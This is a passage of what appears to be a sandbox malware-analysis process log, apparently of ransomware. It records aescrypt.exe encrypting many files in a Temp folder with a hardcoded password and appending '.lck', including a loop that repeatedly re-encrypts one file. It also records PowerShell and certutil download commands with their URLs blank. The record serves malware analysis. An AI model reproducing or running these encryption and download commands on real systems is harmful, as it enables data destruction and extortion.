    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:5708
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:5564
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:5884
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:5392
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
    3⤵
    PID:5992
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6152
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6164
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6180
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6192
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6204
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6220
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6232
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6244
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6256
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6268
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6284
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6296
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6308
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6320
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6332
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6344
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:6368
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:6380
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:6392
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:6404
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:6416
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:6428
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
    3⤵
    PID:6440
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6452
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6464
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6476
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6488
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6504
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6520
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6536
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6548
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6564
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6580
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6596
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6612
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6628
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6644
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6660
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6672
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6684
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6696
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6708
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c Invoke-WebRequest -Uri -OutFile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6812
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f
    3⤵
    PID:6920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:6952
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BroadcastMsg_1603909987.txt.lck" "BroadcastMsg_1603909987.txt"
    3⤵
    PID:6964
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DMIFB33.tmp.lck" "DMIFB33.tmp"
    3⤵
    PID:6980
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "jawshtml.html.lck" "jawshtml.html"
    3⤵
    PID:6996
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "kill.bat.lck" "kill.bat"
    3⤵
    PID:7012
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aria-debug-3308.log.lck" "aria-debug-3308.log"
    3⤵
    PID:7024
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "p2d.bat.lck" "p2d.bat"
    3⤵
    PID:7036
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "wmsetup.log.lck" "wmsetup.log"
    3⤵
    PID:7048
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt.lck" "dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt"
    3⤵
    PID:7060
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AdobeSFX.log.lck" "AdobeSFX.log"
    3⤵
    PID:7076
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "dd_SetupUtility.txt.lck" "dd_SetupUtility.txt"
    3⤵
    PID:7092
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "final.exe.lck" "final.exe"
    3⤵
    PID:7108
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "dd_vcredistUI5B67.txt.lck" "dd_vcredistUI5B67.txt"
    3⤵
    PID:7120
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "chrome_installer.log.lck" "chrome_installer.log"
    3⤵
    PID:7136
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "JavaDeployReg.log.lck" "JavaDeployReg.log"
    3⤵
    PID:7152
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "wct2F16.tmp.lck" "wct2F16.tmp"
    3⤵
    PID:4164
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "sa.9NBLGGH4VZW5_0_0010_.Public.InstallAgent.dat.lck" "sa.9NBLGGH4VZW5_0_0010_.Public.InstallAgent.dat"
    3⤵
    PID:6168
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "sa.9NBLGGH5Q1ZL_0_0010_.Public.InstallAgent.dat.lck" "sa.9NBLGGH5Q1ZL_0_0010_.Public.InstallAgent.dat"
    3⤵
    PID:6188
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MKLUFVRL-20201028-1834.log.lck" "MKLUFVRL-20201028-1834.log"
    3⤵
    PID:6216
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "sa.9WZDNCRCWFTB_0_0010_.Public.InstallAgent.dat.lck" "sa.9WZDNCRCWFTB_0_0010_.Public.InstallAgent.dat"
    3⤵
    PID:6236
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "sa.9WZDNCRFHV4V_0_0010_.Public.InstallAgent.dat.lck" "sa.9WZDNCRFHV4V_0_0010_.Public.InstallAgent.dat"
    3⤵
    PID:6260
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "sa.9PHNB71MKR4J_0_0010_.Public.InstallAgent.dat.lck" "sa.9PHNB71MKR4J_0_0010_.Public.InstallAgent.dat"
    3⤵
    PID:6276
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "sa.9NBLGGH6J6VK_0_0010_.Public.InstallAgent.dat.lck" "sa.9NBLGGH6J6VK_0_0010_.Public.InstallAgent.dat"
    3⤵
    PID:6304
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MKLUFVRL-20201028-1835.log.lck" "MKLUFVRL-20201028-1835.log"
